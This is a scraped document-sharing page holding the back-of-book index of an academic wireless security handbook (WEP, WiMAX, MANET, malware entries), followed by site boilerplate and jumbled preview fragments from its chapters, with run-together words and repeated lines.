SIM) 299 global positioning system (GPS) 587
global system for mobile communications
F
(GSM) 246, 273, 300, 320, 339, 351,
fair MAC (FAIRMAC) 418 364, 760
False Data Injection Attack 635 Gnutella 96
fault tolerance 652 GPRS ciphering algorithm (GPRS-A5) 355
field-programmablegatearray257 (FPGA) GPRS encryption algorithm (GEA) 355
fingerprinting33 GPRS mobility management (GMM) 344
firewalls95 GPRS network architecture 352
firewalls,port-blocking 99 GPRS support nodes (GSN) 352
firewalls,unidirectional 97 GPRS tunneling protocol (GTP) 324, 353

Index
Gradient-based routing (GBR) 641 identity management 44–60

group-to-group (G2G) 602 identity management, for wireless service ac-
groupDiffie-Hellman(GDH)492, 494 cess 104–114
group key handshakes 304 identity management, pros and cons 47–48
group of pictures (GOP) 521 identity management, solutions & controversies
group temporal key (GTK) 304 107
GSM user authentication protocol (GUAP) 367 identity management systems, requirements of
guests 282 107
identity management systems, security infra-
H structure 110
Handoffs 721 IEEE 802.11, and security 64
hashcertification218 protocol IEEE 802.11, family protocols 449
Hash function 209 IEEE 802.16e (Mobile-WiMAX) 364
hash function 417 improved wired equivalent privacy (IWEP)
hash function-based message authentication 240
code (HMAC) 483 individual subscriber authentication key
heterogeneous security 287, 288 (ISAK) 370
heterogeneous sensor networks 634 infection vector 6-7
hierarchical structure 656 Information Society Technologies [IST] 396
high speed downlink packet access (HSDPA) information systems (ISs) 724
275 ingressanti-spoofing(ISA)372
high speed packet access (HSPA) 763 input (INPUT) 356
Home-Agent-MIPv6-Answer Command instant messaging (IM) 281
(HOA) 398 integrated circuits (ICs) 723
Home-Agent-MIPv6-Request Command integrity check value (ICV) 698
(HOR) 398 interleaved hop-by-hop authentication (IHA)
home address (HoA) 396 630, 634
home agent (HA) 396 international mobile subscriber identity (IMSI)
home environment (HE) 319 354, 365, 763
Home location register (HLR) 340 international mobile telecommunications-2000
home location register (HLR) 299, 320, 352, (IMT-2000) 339
763 International Organization for Standardization
home location register-authentication center (ISO) 257
(HLR-AuC) 382 International Organization for Standardization
home provider 281 (ISO/IEC, 2003) 256
home subscriber server (HSS) 343, 382 International Telecommunications Union (ITU)
home subscriber service (HSS) 299 274
human notion trust 646 Internet Control Message Protocol (ICMP) 400
hybrid trust model 487 Internet Engineering Task Force (IETF) 283,
384, 395, 418
I Internet Engineering Task Force (IETF), Diam-
eter 158
identification 633,(ID) 724
Internet key exchange (IKE) 325
identities of mobile users (IMSI) 360
Internet protocol (IP) 779
identity, digital 46
Internet service providers (ISPs) 397
identity, user 54–55
interrogating call session control function (I-
identity-based cryptography (IBC) 602, 612

Index
CSCF) 343 Locknut 5

intrusion, prevention 90 logical key hierarchy (LKH) 492
intrusion detection system (IDS) 531 long term evolution (LTE) 391
intrusion detection systems (IDS) 79, 424 low density parity check (LDPC) 766
IP multimedia subsystem (IMS) 340, 390
IP security (IPsec) 239, 282 M
items of interest (IOIs) 432 machine-to-machine (M2M) 277
malicious software, in mobile devices 1–10
K
malware 1
“KiloByte” SSL (KSSL) 332 malware, defenses 7–8
k-connectivity 655 malware, evolution of 4
k-fault tolerance 655 malware, non-replicating 2
k-nearest neighbor (KNN) 598 man-in-the-middle (MITM) 367, 779
Kaman 200 man-in-the-middle (MITM) attack 130
key (K) 321 MANET, distributed reputation for secure 453
key-compromise impersonation (KCI) 228 MANET, security requirements 505
key-exchange (KE) protocols 211 MANET node 637
key distribution center (KDC) 483 MANET routing, attacks on 419
key distribution interface (Zn) 384 MANETs, key management in 483
Key encryption key (KEK) 766 MANETs, key management schemes in 487
key encryption key (KEK) 483 MANETs, secure routing challenges 507
key generation center (KGC) 217 MANETs, security challenges 416
key pool 645 MANETs, security services 415
key ring 645 MANETs, vulnerabilities 414
key translation centers (KTC) 485 man in the middle (MITM) 82
kilobyte 723 MASK 439
master key (MK), 714
L media access 145
LAN applications 776 media access control (MAC 198
layered attacks 502 medium access control (MAC) 414, 714, 749
LEAP protocol 554 medium access protocol 569
least mean square (LMS) 619 message authentication code (MAC) 32, 603
light-weight hop-by-hop authentication proto- message authentication codes (MACs) 630
col (LHAP) 422 message integrity code (MIC) 136, 700
linear programming (LP) 620, 655 Michael MIC 136
local area networks (LANs) 776 minimum cost forwarding algorithm (MCFA)
localfixednodes(LFNs)396 641
local handshake protocol 715 misbehavior detection module (MDM) 540
local IDS (LIDS) 424 mix route algorithm (MRA) 443
local minimum spanning tree (LMST) 656 Mobile-IP ad hoc networks (MANETs) 500
location-aware end-to-end data security mobile-WiMAX (IEEE 802.16e) 373
(LEDS) 630, 634 mobile ad hoc network (MANET) 413
location-based keys (LBKs) 602 mobile ad hoc network (MANET), security ap-
location-based resilient security (LBRS) 630, proaches to 413
634 mobile ad hoc networks (MANET) 449, 450,
location area identity (LAI) 199 462

Index
mobile ad hoc networks (MANETs) 461, 479, network access servers (NAS) 298
480, 637 network address translation (NAT) 356, 373
mobile agent, strong 29 network application function (NAF) 382
mobile agent, weakly 29 network convergence 178
mobile application part (MAP) 309, 324 network domain security (NDS) 324
mobile broadband 759 network entities (NEs) 325
mobile broadband wireless access (MBWA) network interface card (NIC) 700
759 network layer 768
mobilecertificateauthority 489 (MOCA) network mobility (NEMO) 184, 395
mobile code, security 28–43 Network Performance 680
mobile devices, and malicious software 1–10 networks 281
mobile devices, Internet access from 6 network selection 289
mobile equipment (ME) 382 new AP (nAP) 715
mobile multimedia services (MMS) 298 new European schemes for signatures, integrity,
mobile network (MONET 396 and encryption (NESSIE) 257
mobile network, and trust management 191 new SGSN (SGSNn) 342
mobile network nodes (MNNs) 396 Newsham, Tim 68
mobilenetworkprefix[MNP]396 next generation networks (NGN) 391, 776
mobile node (MN) 202, 397, 711 node, malicious 419
mobile service switching centre (MSC) 352 node,selfish419
mobile station (MS) 320 node MAC 632
mobile stations (MSs) 500 nonrepudiation 501
mobile system, and access control 176–188 Nordic mobile telephony (NMT) 273
mobile system, and authentication 176–188
mobile system, and authorisation’ 176–188 O
monitoring technique 417 old AP (oAP) 715
multimedia, distribution 249 old SGSN (SGSNo) 342
multimedia, sharing 248 OMA broadcast (BCAST) 386
multimedia encryption, and multimedia water- OMA broadcast smart card service protection
marking 248 profile379
multimedia encryption, in wireless environment on-demand protocol 518
236–255 one-way function trees (OFT) 493
multimedia encryption, requirements of 238 onlinecertificatestatusprotocol 704 (OCSP)
multimedia watermarking, and multimedia open mobile alliance (OMA) 379
encryption 248 open system authentication (OSA) 697
multiple description code (MDC) 248 over-the-air (OTA) 380
over the air service provisioning (OTASP) 372
N
National Institute of Standards and Technology P
(NIST) 256 packed data gateway (PDG) 298
National Security Agency (NSA) 257 packet binary convolutional coding (PBCC)
nearfieldcommunication (NFC)
104 520
Neighbor Graph 721 packet core 372
network-oriented design 280 packet data network (PDN) 352
network-to-network (N2N) 277 packet data protocol (PDP) 344, 353
Network Access Control 721 packet forwarding attacks 419

Index
packet radio network (PRNET) 640 (PEAP) 777

packet switch (PS) 298 protocol environments 211
packet switched (PS) 321 proxy call session control function (P-CSCF)
pair-wise maser key (PMK) 714 343
pair-wise master key (PMK) 702 pseudo-random number generator (PRNG) 698
pairwise transient key (PTK) 304 pseudonyms, and identity 120
passive tag 725 public-key cryptography 571
password authentication 195 public-key cryptography (PKC) 612
password authentication protocol (PAP) 160, public access wireless networks (PAWNs) 285
779 publickeycertificates 205(PKC)
path key establishment 645 public key infrastructure (PKI) 256, 386, 484,
peer-to-peer (P2P) network, and security 485, 766, 781
95–103 public key interface (PKI) 388
peer-to-peer paradigm (P2P) 438 public land mobile network (PLMN) 298, 367
peer intermediaries for key establishment public land mobile networks (PLMN) 273
(PIKE) 491 public switched telephone network (PSTN)
perfect forward secrecy (PFS) 290 284
perimeter security (PS 373
personal area network (PAN) 13, 148, 396 Q
personal area networks (PAN) 277 quality of protection (QoP) 240
point-to-point protocol (PPP) 777 quality of service (QoS) 105, 240, 280, 344,
policy decision points (PDP) 282 500, 766
policy enforcement points (PEP) 282
polynomial share 645 R
port access entity (PAE) 701
radio-frequencyidentification 723 (RFID)
power control 652
radio access network (RAN) 340
presence and availability working Group (PAG)
radio access networks (RANs) 277
389
radiofrequencyfingerprinting 84 (RFF)
presence and availability working group (PAG)
radio network controller (RNC) 320, 340, 365,
390
763
pretty good privacy (PGP) 483
radio network service node (RNSN) 376
Privacy 209
RADIUS protocol 196
privacy 115
random challenge (GPRS-RAND 355
privacy, and authentication 14
random number (RAND) 322
privacy, and authorization 14
reactive routing protocols 640
privacy, and security 14
registration authority (RA) 486
privacy, and trust 14
related signed response (GPRS-SRES) 355
privacy-enhancing techniques 115–128
relative neighborhood graph (RNG) 656
privacy key management (PKM 201
remote authentication dial in user service (RA-
privacy key management for extensible authen-
DIUS) 14, 158, 776
tication protocol (PKM-EAP) 373
removable user identity module (R-UIM) 388
privacy preserving routing (PPR) 441
repeater stations (RSs 201
privacy protection 116
replay attack 419
proactive key caching (PKC) 716
reputation mechanisms 417
probabilistic forwarding (PFR) 642
request-to-send (RTS) 418
protected EAP (PEAP) 375
residential gateways (RG) 711
protected extensible authentication protocol
rfmon 63

Index
roaming agreements 281 security, tamper resistant storage 148

Ron’s Cipher #4 (RC4) 240 Security Architecture 766
round trip times (RTT) 275 security architecture 760
roup temporal key (GTK) 702 security association (SA) 398
router advertisement (RA) 398 securityassociationidentifier 766 (SAID)
route reply (RREP) 435 security attacks 481
route request (RREQ) 419, 435 security gateways (SEGs) 325
routing area identity (RAI) 354 security goals 481
security mechanisms 725
S security parameter establishment (SPE) 438
scanning, passive 81 Security Parameter Index (SPI) 202
second-generation (2G) 339 security protocol 764
second generation (2G) 274, 319, 351 security protocols 776
second hand information (SHI) 610 Security Service 731
secure ad hoc distance vector (SAODV) 522 security services 725
secureandefficientkeymanagement(SEKM) security sublayer 750
510 self-organized CA (SOCA) 510
secure AODV (SAODV) 420 self-protection problem 660
secure communication 779 semantic access control policies 469
secure directed diffusion (SDD) 644 semantic context-driven access control 467
secure distributed anonymous routing protocol sensor applications 652
(SDAR) 439 sensor coverage 652
secureefficientadhocdistancevector sensor network 568, 652
routing
protocol (SEAD) 420 sensor protocols for information via negotiation
secure hash algorithm-1 (SHA-1) 257 (SPIN) 642
secure network encryption protocol (SNEP) service-oriented 280
603 service contract 281
secure positioning for sensor networks (SPINE) service discovery and advertisement (SDA) 11
572 service orientation 11
Secure routing 588 service provider 57–58
secure routing protocol (SRP) 420, 451, 488 service provider networks (SPNs) 281
secure service discovery 11–27 service providers 281
secure socket layer (SSL) 198, 239, 364, 373 services 281
secure transient association 422 servicesetidentification 289 (SSID)
secure user plane location (SUPL) 390 service set identifier (SSID)detection
81
security, and multimedia watermarking 239 serving call-session-control-function (S-CSCF)
security, authentication 189 381
security, black-box 30 serving call session control function (S-CSCF)
security,firewall95–103 issues 343
security, infrastructure-based 15 Serving GPRS support node (SGSN) 299
security, in home networks 184 serving GPRS support node (SGSN) 320, 341,
security, in wireless environment 183 368
security, P2P 95–103 serving GSN (SGSN) 352
security, requirements in wireless environments serving network (SN) 319, 355
79 Session hijack 783
security, smart space dependent 18 session initiation protocol (SIP) 340

Index
session MAC 632 temporary mobile subscriber identities (TMSI)

shared key authentication (SKA) 697 763
shared key discovery phase 645 temporary mobile subscriber identity (TMSI)
short message service (SMS) 274, 380 199, 354
signaling system 7 (SS7) 356 third generation (3G) 318
Signalling System 7 (SS7) 180 threat protection system (TPS) 373
signed response (GPRS-SRES) 355 three-party key-distribution (3PKD) 217
single sign-on 55–56 ticket granting server (TGS) 200
single sign-on (SSO) protocol 178 time-to-live (TTL) 557
sink hole attack 644 time division-sychrononous CDMA (TD-SCD-
skinny tree (STR) 495 MA) 339
sleep deprivation attack 643 time division multiple access (TDMA) 273,
Sleeper protocol 18 641, 767
smart card 153 time division multiplex (TDM) 683
sniffing81 topologically-inspired attack 643
software agent 28 topology 654
spoofing82 topology control 652
Sprite 421 topology design 661
SSRD protocol 19 total access communication system (TACS)
Static keying 645 273
stationary secure database (SSD) 540 TRAFFIC 422
Statisticen-routefilteringmechanism (SEF) 130
traffic
630 transmission control protocol (TCP) 162
subscriber identity module (SIM) 353, 354, transport encryption key (TEK) 766
380, 783 transport layer security (TLS) 328, 364, 386,
subscriberstatefulfirewall 372 (SSF) 711, 712, 752, 767
subscriber station (SS) 766 transport layer security (TLS) protocol 162
support of the current serving GSN (SGSN) tree-basedgroupDiffie-Hellman(TGDH) 494
763 triple data encryption standard (3DES) 240
Sybil attack 444, 644 Trojan horse, Drever 5
Symmetric cryptography 575 Trojan horse, Locknut 5
system-on-chip design 256 Trojan horse, Skuller 5
system architecture evolution (SAE) 391 trust,definitionandprinciples 464
system design 652 Trust Cloud 721
trust context 646
T trusted third party 56–57
tag’s identity 725 trusted third party (TTP) 423, 483
tags 723 Trust Link 721
tatisticen-routefiltering 634 (SEF) trust management 190, 461, 464, 636
telecoms & Internet converged services & pro- trust management, advances in 191–192
tocols for advanced networks (TISPAN) trust management, systems 465
390 trust models 484
temporal key integrity protocol (TKIP) 304, trust packet acknowledgment (TPA) 648
700, 780, 784 trust packet precision (TPP) 648
temporary identities (TMSI, TLLI) 360 tunneled TLS (TTLS) 375
temporary logical link identity (TLLI) 354
10
Index
U visiting mobile nodes (VMNs) 396

visitor location register (VLR) 352, 763
ubiquitous and robust access control (URSA) visitors 281
488 voice over IP (VoIP) 176, 368
UC security model 211
UMTS integrated circuit card (UICC) 327 W
UMTS subscribers identity module (USIM)
300 war driving 131
UMTS terrestrial radio access network wardriving, wireless 61–77
(UTRAN) 320 watermarking 32
universal integrated circuit card (UICC) 381 watermarking, and imperceptibility 238
Universal mobile telecommunications system watermarking, and security 238
(UMTS) 339, 763 watermarking, in wireless environment 236–
universal mobile telecommunications system 255
(UMTS) 146, 299, 759, 760 watermarking, lightweight 246
universal mobile telecommunication system watermarking algorithm, for wireless multime-
(UMTS) 318 dia 245
universal SIM (USIM) 380 web-of-trust model 486
user-oriented design 280 Web services (WS) 384
user datagram protocol (UDP) 309 Wi-Fi protected access (WPA) 132, 697, 699,
user equipment (UE) 340, 382 761, 784
users 281 Wi-Fi security protocol 766
user service identity module (USIM) 321 wideband code division multiple access (W-
user terminal (UT) 340 CDMA) 275
USIM application toolkit (3GPP TS 33.111, wideband code division multiple access (WCD-
2001) 327 MA) 320
WiFi network 291
V wired equivalence privacy (WEP) 780
wired equivalent privacy (WEP) 131, 240, 761
vehicular ad hoc networks (VANET) 450, 457 wireless access gateway (WAG) 298
vehicular area network (VAN) 396 wireless application layer (WAL) 284
verifiablemultilateration 571 (VM) wireless application protocol (WAP) 298, 368
vertical handover 286 wireless area network (WAN) 13
very large-scale integration (VLSI) 256, 274, wireless environment, multimedia encryption
364 and watermarking 236–255
VHSIC hardware description language (VHDL) wireless interface 62–77
265 wireless intrusion detection system (WIDS) 78
video encryption algorithm (VEA) 242 wireless intrusion tracking system (WITS) 88
video object plane (VOP) 242 wireless LAN (WLAN 346
video on demand (VoD) 176 wireless LAN (WLAN) 210, 240, 272
virtual operators (VOs) 281 wireless LANs (WLANs) 297
virtual private network (VPN) 198, 282, 300, wireless MAC security 417
357, 373, 747, 768 wireless metropolitan area networks (WMAN)
virtual private networks (VPNs) 198, 324 347
virutal backbone 656 wireless metropolitan area networks (WMANs)
visiting location register (VLR) 347 760
Visiting Mobile Node (VMN) 403
11
Index
wireless multimedia, and encryption algorithms wireless transport layer security (WTLS) 328,
239 368
wireless multimedia, and watermarking algo- wireless wardriving 61–77
rithms 245 wireless wide area network (WWAN) 347
Wireless network 209 WLAN 721
wireless network 189 WLAN-access gateway (WLAN-AG) 298
wireless network, and authentication 193 WLAN-access point name (W-APN) 299
Wireless Networks 721 WLAN authentication and privacy infrastruc-
wireless networks, and security challenges 130 ture (WAPI) 210
wireless networks, and threats in 79 worldwide interoperability for microwave ac-
wireless networks, and vulnerabilities 129–144 cess (WiMAX) 776
wireless networks, channel jamming 130 worm, Cabir 4
wireless networks, illicit use of 81 worm, Mabir 5
wireless networks, intrustion and anomaly wormhole attack 419, 644
detection in 78–94 wormhole attacks 648
wireless networks, passive scanning 81
wirelessnetworks,serviceset- identifier X detec
tion 81 XMLconfigurationaccessprotocol(XCAP)
wirelessnetworks,sniffing81 391
wirelessnetworks,spoofing82 XML document management (XDM) 390
wirelessnetworks,traffic 130analysis
wireless networks, unauthorized access 130 Y
wireless routing protocols 504
Yao graph (YG) 656
Wireless security 724
Wireless Sensor Network (WSN) 209 Z
Wireless sensor networks (WSN) 628
wireless sensor networks (WSN) 617 zone-based IDS (ZBIDS) 425
wireless sensor networks (WSNs) 565
wireless service access, and identity manage-
ment 104–114
12

Handbook of Research On Wireless Security - Zhang & Others

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Handbook of Research On Wireless Security - Zhang & Others

Uploaded by

Copyright:

Available Formats

Handbook of Research on

Information science reference

thenetwork.UPnPDeviceSecurityspecification heterogeneous network domains. The system uses a

smart space dependent security ExAMPlEs usIng trust ModEls

MARKS consists of trust management and security

trust in service composition conclusIon

A device in a pervasive computing environment The general availability of broadband-wireless-

cases, and when the devices/users are not a priori WorkshoponIntelligentEnvironments(IE0502 ) 5

IntroductIon fortelecommunicationnetworksor - asartificiali

cannot be attacked in the aforementioned sense. Encrypted functions

thenetwork.UPnPDeviceSecurityspecification heterogeneous network domains. The system uses a

smart space dependent security ExAMPlEs usIng trust ModEls

MARKS consists of trust management and security

trust in service composition conclusIon

A device in a pervasive computing environment The general availability of broadband-wireless-

cases, and when the devices/users are not a priori WorkshoponIntelligentEnvironments(IE0502 ) 5

IntroductIon fortelecommunicationnetworksor - asartificiali

cannot be attacked in the aforementioned sense. Encrypted functions

cryptographic traces key of the originator has to be known by all agent

hosts, the mark is a normal part of results and is fingerprinting

Figure 1. Example of watermarking

The manager can be an originator of the agent. The Initial Phase

Figure 3. Distributing ID and shares to hosts

Figure 4. Mobile agent as an FSM

2. The agent creates the rest of the shares from Definition(Karjoth

Definitions and Notions In this chapter we refer to forward integrity as

Table 1. Practical comparison of the integrity protection methods

Implementation Protects code Protects data Protects execution state

Zero knowledge proof Easy Yes Yes Yes

Table 2. Theoretical comparison of integrity protection methods

Weak forward Strong forward Publiclyverifiable Black-box

Modifications next possibility for the future work would be to

theagents’securitycanbesignificantly rity. increased

• Anonymity: Anonymity is when agents’ Strong Mobility: Strong mobility of an agent

IntroductIon the integration of heterogeneous wireless networks

Auditing and Reporting person to impersonate that individual. In a typical

Who You Are

Directory Services Security

Standards Organisation Area of Standards / Example Standards

Figure 1. Typical access scenario in tradition networks

The access path to

The access path to

Figure 2. Simple access scenarios in NG wireless networks

The access to both

consolidate the identity-related information, you •

Figure 3. An overview of IdM requirements and NG wireless networks

To increase security, users should be able to choose Network Operator Requirements

Interface to Trusted Third Party Figure 4. Network operator’s position in the NG

issue, authenticate, and control NG wireless net-

Security enterprises, e-commerce sites, governments, and

tHE (Art of) wArdrIvIng nowadaysitimpliesthreebasicsteps:)finding 1(

HArdwArE And softwArE device drivers and scanning

Table 2. Properties of the CRC32 function employed in the WEP

no Encryption standard allows the user to embed the SSID within

Figure 1. The message in clear form to be encrypted with WEP

Message M CSum=CRC 32(M)

Figure 2. The seed used to encrypt packets with WEP

IV (24 bit) WEP Key (40 or 104 bit)

WEP Encrypted Frame

wPA Encryption radiate more than required power, resulting in the

Wireless Power wEP AttAcks

Regarding the collection of the first byte

Figure 4. Scenario when an oracle attack is performed